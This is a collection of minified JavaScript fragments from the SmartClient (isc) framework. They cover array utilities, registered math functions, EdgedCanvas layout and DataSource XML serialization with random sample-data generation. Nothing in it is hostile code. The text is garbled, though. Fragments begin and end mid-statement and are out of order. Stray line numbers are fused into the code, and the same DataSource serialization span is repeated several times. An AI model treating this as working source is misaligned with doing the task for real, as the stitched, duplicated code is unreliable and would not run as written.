_9=_7*_7+_8*_8;if(_9<=0.00001){return this.euclideanDistance(_1,_2,_5,_6)}667var u=((_5-_1)*(_3-_1)+(_6-_2)*(_4-_2))/_9;if(u<0){return this.euclideanDistance(_1,_2,_5,_6)}else if(u>1){return this.euclideanDistance(_3,_4,_5,_6)}else{var x=_1+u*_7,y=_2+u*_8;return this.euclideanDistance(x,y,_5,_6)}},euclideanDistance:function(_1,_2,_3,_4){if(arguments.length==2){var _5=_1,_6=_2;_1=_5[0];_2=_5[1];_3=_6[0];_4=_6[1]}668return this.$101k((_1-_3),(_2-_4))},$125w:Math.PI/180,$167a:Math.PI/2,toRadians:function(_1){return _1*this.$125w},cosdeg:function(_1){return Math.cos(_1*this.$125w)},sindeg:function(_1){return Math.sin(_1*this.$125w)},$fr:function(_1,_2){var _3=0;for(var i=0;i<_1.length;++i){_3+=_1[i]*_2[i]}


504if(_5){_4[_8]=_7;continue}505var _9=_4[_8];if(_9==null){if(_2){_4[_8]=[_7]}else{_4[_8]=_7}}else{if(_2){_4[_8].add(_7)}else{if(isc.isAn.Array(_9)){_4[_8].add(_7)}else{_4[_8]=[_9,_7]}}}}506return _4},isc.A.arraysToObjects=function isc_Arra_arraysToObjects(_1){var _2=_1.length;var _3=new Array(this.length);for(var i=this.length;i--;){var _5=this[i],_6=_3[i]={};for(var p=_2;p--;){var _8=_1[p];_6[_8]=_5[p]}}507return _3},isc.A.objectsToArrays=function isc_Arra_objectsToArrays(_1){var _2=_1.length;var _3=new Array(this.length);for(var i=this.length;i--;){var _5=this[i],_6=_3[i]=[];for(var p=_2;p--;){var _8=_1[p];_6[p]=_5[_8]}}508return _3},isc.A.spliceArray=function isc_Arra_spliceArray(_1,_2,_3){var _4;if(_1===_4)return this.splice();if(_2===_4)return this.splice(_1);if(_3===_4)return this.splice(_1,_2);if(!isc.isAn.Array(_3)){isc.Log.logWarn("spliceArray() method passed a non-array third parameter. Ignoring...","Array");return this.splice(_1,_2)}509return this.splice.apply(this,[_1,_2].concat(_3))},isc.A.peek=function isc_Arra_peek(){var _1=this.pop();this.push(_1);return _1},isc.A.getCachedRow=function isc_Arra_getCachedRow(_1){return this[_1]},isc.A.shuffle=function isc_Arra_shuffle(){var n=this.length;while(n>0){var i=Math.floor(Math.random()*n);n--;var _3=this[n];this[n]=this[i];this[i]=_3}},isc.A.removeItem=function isc_Arra_removeItem(_1){return this.removeAt(_1)},isc.A.getItem=function isc_Arra_getItem(_1){return this.get(_1)},isc.A.setItem=function isc_Arra_setItem(_1){return this.set(_1)},isc.A.clearAll=function isc_Arra_clearAll(_1){return this.removeList(this)},isc.A.size=function isc_Arra_size(){return this.getLength()},isc.A.subList=function isc_Arra_subList(_1,_2){return this.getRange(_1,_2)},isc.A.addAll=function isc_Arra_addAll(_1){return this.addList(_1)},isc.A.removeAll=function isc_Arra_removeAll(_1){var _2=this.getLength();this.removeList(_1);return this.getLength()!=_2},isc.A.clear=function isc_Arra_clear(){this.setLength(0)},isc.A.toArray=function isc_Arra_toArray(){return this.duplicate()});isc.B._maxIndex=isc.C+79;if(!isc.Browser.isIE||


isc.Browser.isIE8Strict){Array.prototype.duplicate=Array.prototype.slice}510if(isc.Browser.isIE){[].fastIndexOf();[].fastIndexOf()}511if(Array.prototype.nativeIndexOf!=null){Array.prototype.indexOf=function(_1,_2,_3,_4){var _5=Object(this),_6=_5.length>>>0;if(_2==null)_2=0;else if(_2<0)_2=Math.max(0,_6+_2);if(_3==null)_3=_6-1;var i;if(_4!=null){for(i=_2;i<=_3;++i){if(_4(_5[i],_1))return i}}else{if(isc.isAn.Instance(_1)){i=Array.prototype.nativeIndexOf.call(_5,_1,_2);if(i>_3)i=-1;return i}512for(i=_2;i<=_3;++i){if(_5[i]==_1)return i}}513return-1}}else{Array.prototype.nativeIndexOf=Array.prototype.indexOf}514if(isc.Browser.isFirefox||isc.Browser.isSafari){Array.prototype.fastIndexOf=Array.prototype.nativeIndexOf}


3778var _2=_1.$152v();_2.name=_1.name.toLowerCase();_2.defaultSortPosition=-1;if(!this.$65z[_2.name]){this.$65z[_2.name]=_2}3779var _3=_1.$152v();_3.name=_1.name.toUpperCase();_3.defaultSortPosition=-1;if(!this.$65z[_3.name]){this.$65z[_3.name]=_3}3780var _4=_1.$152v();_4.name=(_1.name.substr(0,1).toUpperCase()+_1.name.substr(1));_4.defaultSortPosition=-1;if(!this.$65z[_4.name]){this.$65z[_4.name]=_4}},isc.A.getRegisteredFunctionNames=function isc_c_MathFunction_getRegisteredFunctionNames(){return isc.getKeys(this.$65z)},isc.A.getDefaultFunctionNames=function isc_c_MathFunction_getDefaultFunctionNames(){var _1=this.getDefaultFunctions(),_2=_1.makeIndex("name",false);return isc.getKeys(_2)},isc.A.getRegisteredFunctions=function isc_c_MathFunction_getRegisteredFunctions(){return isc.getValues(this.$65z)},isc.A.getDefaultFunctions=function isc_c_MathFunction_getDefaultFunctions(){var _1=this.getRegisteredFunctions(),_2=_1.findAll("defaultSortPosition",-1)||[];for(var i=0;i<_2.length;i++){var _4=_2[i];_1.remove(_4)}3781_1.sortByProperties(["defaultSortPosition"],["true"]);return _1},isc.A.getRegisteredFunctionIndex=function isc_c_MathFunction_getRegisteredFunctionIndex(){var x=this.getRegisteredFunctions();var _2=x.makeIndex("name",false);return _2},isc.A.getDefaultFunctionIndex=function isc_c_MathFunction_getDefaultFunctionIndex(){return this.getDefaultFunctions().makeIndex("name",false)},isc.A.isRegistered=function isc_c_MathFunction_isRegistered(_1){if(this.$65z[_1])return true;return false});isc.B._maxIndex=isc.C+8;isc.A=isc.MathFunction.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.defaultSortPosition=-1;isc.B.push(isc.A.$152v=function isc_MathFunction__copy(_1){var _2={};for(var _3 in this){if(this.hasOwnProperty(_3)){_2[_3]=this[_3]}}3782return this.getClass().create(_2,_1)});isc.B._maxIndex=isc.C+1;isc.MathFunction.registerFunction(isc.MathFunction.create({name:"max",description:"Maximum of two values",usage:"max(value1, value2)",defaultSortPosition:1,jsFunction:function(_1,_2){return Math.max(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"min",description:"Minimum of two values",usage:"min(value1, value2)",defaultSortPosition:2,jsFunction:function(_1,_2){return Math.min(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"clamp",description:"Value clamped to range specified",usage:"clamp(value1, value2)",defaultSortPosition:3,jsFunction:function(_1,_2,_3){return isc.Math.clamp(_1,_2,_3)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"round",description:"Round a value up or down, optionally providing <i>decimalDigits</i> as the maximum number of decimal places to round to. For fixed or precision rounding, use <i>toFixed()</i> and <i>toPrecision()</i> respectively.",usage:"round(value,decimalDigits)",defaultSortPosition:4,jsFunction:function(_1,_2){if(_2){var _3=Math.pow(10,_2),_4=Math.round(_1*_3)/_3;return _4}3783return Math.round(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"ceil",description:"Round a value up",usage:"ceil(value)",defaultSortPosition:5,jsFunction:function(_1){return Math.ceil(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"floor",description:"Round a value down",usage:"floor(value)",defaultSortPosition:6,jsFunction:function(_1){return Math.floor(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"abs",description:"Absolute value",usage:"abs(value)",defaultSortPosition:7,jsFunction:function(_1){return Math.abs(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"pow",description:"Value1 to the power of Value2",usage:"pow(value1, value2)",defaultSortPosition:8,jsFunction:function(_1,_2){return Math.pow(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"sqrt",description:"Square root of a value",usage:"sqrt(value)",defaultSortPosition:9,jsFunction:function(_1){return Math.sqrt(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"dateAdd",description:"Excel™-compatible dataAdd function: adds a specified time interval to a date value",usage:"dateAdd(Date value, TimeUnit interval, number amount)",defaultSortPosition:10,jsFunction:function(_1,_2,_3){if(_1==null||!isc.isA.Date(_1))return null;var _4=_1.duplicate();isc.DateUtil.dateAdd(_4,_2,_3,1,_1.logicalDate);return _4}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"toPrecision",description:"Format a number to a length of <i>precision</i> digits, rounding or adding a decimal point and zero-padding as necessary. Note that the values 123, 12.3 and 1.23 have an equal precision of 3. Returns a formatted string and should be used as the outermost function call in a formula. For rounding, use <i>round()</i>.",usage:"toPrecision(value,precision)",defaultSortPosition:11,jsFunction:function(_1,_2){var _3=_1;if(isc.isA.String(_3))_3=parseFloat(_3);if(isNaN(_3))return _1;return _3.toPrecision(_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"toFixed",description:"Round or zero-pad a number to <i>digits</


i> decimal places. Returns a formatted string and should be used as the outermost function call in a formula. To round values or restrict precision, use <i>round()</i> and <i>toPrecision()</i> respectively.",usage:"toFixed(value,digits)",defaultSortPosition:12,jsFunction:function(_1,_2){var _3=_1;if(isc.isA.String(_3))_3=parseFloat(_3);if(isNaN(_3))return _1;return _3.toFixed(_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"sin",description:"Sine of a value",usage:"sin(value)",defaultSortPosition:13,jsFunction:function(_1){return Math.sin(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"cos",description:"Cosine of a value",usage:"cos(value)",defaultSortPosition:14,jsFunction:function(_1){return Math.cos(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"tan",description:"Tangent of a value",usage:"tan(value)",defaultSortPosition:15,jsFunction:function(_1){return Math.tan(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"ln",description:"Natural logarithm of a value",usage:"ln(value)",defaultSortPosition:16,jsFunction:function(_1){return Math.log(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"log",description:"logarithm of a value with the specified <i>base</i>",usage:"log(base, value)",defaultSortPosition:17,jsFunction:function(_1,_2){return Math.log(_2)/Math.log(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"asin",description:"Arcsine of a value",usage:"asin(value)",defaultSortPosition:18,jsFunction:function(_1){return Math.asin(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"acos",description:"Arccosine of a value",usage:"acos(value)",defaultSortPosition:19,jsFunction:function(_1){return Math.acos(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"atan",description:"Arctangent of a value (-PI/2 to PI/2 radians)",usage:"atan(value)",defaultSortPosition:20,jsFunction:function(_1){return Math.atan(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"atan2",description:"Angle theta of a point (-PI to PI radians)",usage:"atan2(value1,value2)",defaultSortPosition:21,jsFunction:function(_1,_2){return Math.atan2(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"exp",description:"The value of E<sup>value</sup>",usage:"exp(value)",defaultSortPosition:22,jsFunction:function(_1){return Math.exp(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"random",description:"Random number between 0 and 1",usage:"random()",defaultSortPosition:23,jsFunction:function(){return Math.random()}}));isc.Canvas.registerStringMethods({userAddedField:"field",selectionUpdated:"record,recordList",onFetchData:"criteria,requestProperties"});isc.defineClass("EdgedCanvas","Canvas");isc.A=isc.EdgedCanvas.getPrototype();isc.A.redrawOnResize=false;isc.A._redrawWithParent=false;isc.A.$jp=false;isc.A.$jo=false;isc.A.useClipDiv=false;isc.A.isSnapAlignCandidate=false;isc.A.overflow=isc.Browser.isMoz?isc.Canvas.VISIBLE:isc.Canvas.HIDDEN;isc.A.$ks=false;isc.A.$tb=0;isc.A.$td=0;isc.A.$tc=0;isc.A.$te=0;isc.A.$y0=["TL","T","TR","L","center","R","BL","B","BR"];isc.A.$98g={L:true,TL:true,BL:true};isc.A.$98h={R:true,TR:true,BR:true};isc.A.$920=["TR","T","TL","R","center","L","BR","B","BL"];isc.A.skinImgDir="images/edges/";isc.A.edgeImage="[SKIN]/rounded/frame/FFFFFF/6.png";isc.A.shownEdges={TL:true,T:true,TR:true,L:true,R:true,BL:true,B:true,BR:true};isc.A.edgeSize=6;isc.A=isc.EdgedCanvas.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.$61h="<TD class='";isc.A.$61i="' ></TD>";isc.A.$y2="<TABLE role='presentation' CELLPADDING='0' CELLSPACING='0' STYLE='height:100%;width:100%;table-layout:fixed'><COL WIDTH=";isc.A.$y3="><COL><COL WIDTH=";isc.A.$98i=["background-size:",,," ",,,";"];isc.A.$4n=" class=";isc.A.addEdgeStyleSuffix=false;isc.A.forceMozRowHeight=true;isc.B.push(isc.A.initWidget=function isc_EdgedCanvas_initWidget(){this.invokeSuper(isc.EdgedCanvas,this.$oc);var _1=this.customEdges;if(_1){var _2=this.shownEdges={};if(_1.contains("T")){_2.T=_2.TL=_2.TR=true}3784if(_1.contains("B")){_2.B=_2.BL=_2.BR=true}3785if(_1.contains("L")){_2.L=_2.TL=_2.BL=true}3786if(_1.contains("R")){_2.R=_2.TR=_2.BR=true}}3787this.updateEdgeSizes()},isc.A.updateEdgeSizes=function isc_EdgedCanvas_updateEdgeSizes(){var _1=this.edgeSize;this.$y4=this.$du(this.edgeLeft,_1);this.$y5=this.$du(this.edgeRight,_1);this.$y6=this.$du(this.edgeTop,_1);this.$y7=this.$du(this.edgeBottom,_1);var _2=this.shownEdges,_3=this.edgeOffset;if(_2.L)this.$tb=this.$du(this.edgeOffsetLeft,_3,this.$y4);if(_2.R)this.$tc=this.$du(this.edgeOffsetRight,_3,this.$y5);if(_2.T)this.$td=this.$du(this.edgeOffsetTop,_3,this.$y6);if(_2.B)this.$te=this.$du(this.edgeOffsetBottom,_3,this.$y7);this.markForRedraw()},isc.A.getInnerWidth=function isc_EdgedCanvas_getInnerWidth(_1,_2,_3){var _4=this.invokeSuper(isc.EdgedCanvas,"getInnerWidth",_1,_2,_3);return _4-this.$tb-this.$tc},isc.A.getInnerHeight=function isc_EdgedCanvas_getInnerHeight(_1,_2,_3){var _4=this.invokeSuper(isc.EdgedCanvas,"getInnerHeight",_1,_2,_3);return _4-this.$td-this.$te},isc.A.getInnerHTML=function isc_EdgedCanvas_getInnerHTML(){var _1=isc.SB.create(),_2=this.edgeImage,_3=_2.lastIndexOf(isc.dot),_4=_2.substring(0,_3),_5=_2.substring(_3),_6=this.getImgURL(_4),_7="<TD HEIGHT=",_8="<TD",_9,_10,_11;if(!isc.Browser.isIE10&&!isc.Browser.isEdge&&!((isc.Browser.isStrict&&isc.Browser.isIE&&isc.Browser.version>=8)||(isc.Browser.isMoz&&isc.Browser.isUnix)))3788{var _12=isc.EdgedCanvas.$y8;if(!_12){_12=isc.EdgedCanvas.$y8={width:"100%",height:"100%"};if(isc.Browser.isSafari)_12.align="middle";if(isc.Browser.isStrict&&!isc.Browser.isTransitional){_12.extraCSSText="display:block"}



717return _5.release(false)},isc.A.shouldWriteSchemaType=function isc_DataSource_shouldWriteSchemaType(_1){if(!_1)return true;if(_1.serializeXMLType!=null)return _1.serializeXMLType;else{return(_1.type==null||_1.type=="any")}},isc.A.$38g=function isc_DataSource__serializeSimpleTypeTag(_1,_2,_3,_4,_5){var _6=_2.type,_5=_5||{};if(isc.isAn.Object(_3)&&!isc.isA.Function(_3.$ew)){return isc.Comm.xmlSerialize(_1||null,_3)}else{var _6=!_5.xmlExplicitType||this.shouldWriteSchemaType(_2)?this.$38h(_6,_3):null;if(_3==null&&_2.nillable){var _7=_1||"value";return isc.Comm.$36u(_7,null,_4,_5.nsPrefixes,true)+" xsi:nil=\"true\"/>"}718if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}719return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}720switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}721if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}722var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}723return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}724var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}725return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}726return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}727_3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}


718if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}719return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":


(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}720switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}721if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}722var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}723return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}724var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}725return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}726return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}727_3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}728return _1},isc.A.getDeclaredMethod=function isc_DataSource_getDeclaredMethod(_1){var _2=this.getMethods();for(var i=0;i<_2.length;i++){if(_2[i].name==_1){return _2[i]}}},isc.A.getStringMethod=function isc_DataSource_getStringMethod(_1,_2){var _3=this.getDeclaredMethod(_1);if(_3){var _4=isc.addProperties({},_3);_4.value=_2;return isc.StringMethod.create(_4)}


716if(_14){isc.Comm.omitXSI=_15}717return _5.release(false)},isc.A.shouldWriteSchemaType=function isc_DataSource_shouldWriteSchemaType(_1){if(!_1)return true;if(_1.serializeXMLType!=null)return _1.serializeXMLType;else{return(_1.type==null||_1.type=="any")}},isc.A.$38g=function isc_DataSource__serializeSimpleTypeTag(_1,_2,_3,_4,_5){var _6=_2.type,_5=_5||{};if(isc.isAn.Object(_3)&&!isc.isA.Function(_3.$ew)){return isc.Comm.xmlSerialize(_1||null,_3)}else{var _6=!_5.xmlExplicitType||this.shouldWriteSchemaType(_2)?this.$38h(_6,_3):null;if(_3==null&&_2.nillable){var _7=_1||"value";return isc.Comm.$36u(_7,null,_4,_5.nsPrefixes,true)+" xsi:nil=\"true\"/>"}718if(isc.isA.Date(_3)){_3=_3.toSchemaDate(_2.type,!!this.trimMilliseconds)}else if(_3!=null&&_3.$ew){return _3.$ew(_1,_6,_4)}else{_3=isc.makeXMLSafe(_3)}719return isc.Comm.$ex(_1||"value",_3,_6,_4,_5.nsPrefixes)}},isc.A.$38f=function isc_DataSource__serializeSimpleTypeValue(_1,_2){if(isc.isA.Date(_2)){return _2.toSchemaDate(_1?_1.type:null)}else{return isc.makeXMLSafeAttribute(_2)}},isc.A.$38h=function isc_DataSource__getXMLSchemaType(_1,_2){if(_2!=null&&(_1==null||_1=="any")){if(_2==null)return null;if(isc.isA.Date(_2)){return _2.logicalDate?"date":(_2.logicalTime?"time":"datetime")}else if(isc.isA.Number(_2)){if(parseInt(_2)==_2){return"float"}else{return"integer"}}else if(isc.isA.Boolean(_2)){return"boolean"}else if(isc.isA.String(_2)){return"text"}}


720switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}721if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}722var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}723return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}724var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}725return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}726return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}


720switch(_1){case"integer":return"int";case"number":return"long";default:return _1}},isc.A.$151z=function isc_DataSource__getXmlExplicitTypes(_1){var _2=_1;if(isc.isA.String(_2))_2=(_2=="true");return _2},isc.A.xmlSerializeSample=function isc_DataSource_xmlSerializeSample(){return this.xmlSerialize({},{spoofData:true})},isc.A.getSpoofedData=function isc_DataSource_getSpoofedData(_1){if(!_1)return"textValue";if(this.getSchema(_1.type)!=null)return{};if(_1.multiple){_1={type:_1.type};return[this.getSpoofedData(_1),this.getSpoofedData(_1)]}721if(_1.valueMap){var _2=!isc.isAn.Array(_1.valueMap)?isc.getKeys(_1.valueMap):_1.valueMap;return _2[Math.round(Math.random()*(_2.length-1))]}722var _3=isc.SimpleType.getBaseType(_1.type);switch(_3){case"boolean":return(Math.random()>0.5);case"integer":case"int":case"number":var _4=0,_5=10;if(_1.validators){var _6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}723return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}724var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}725return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}726


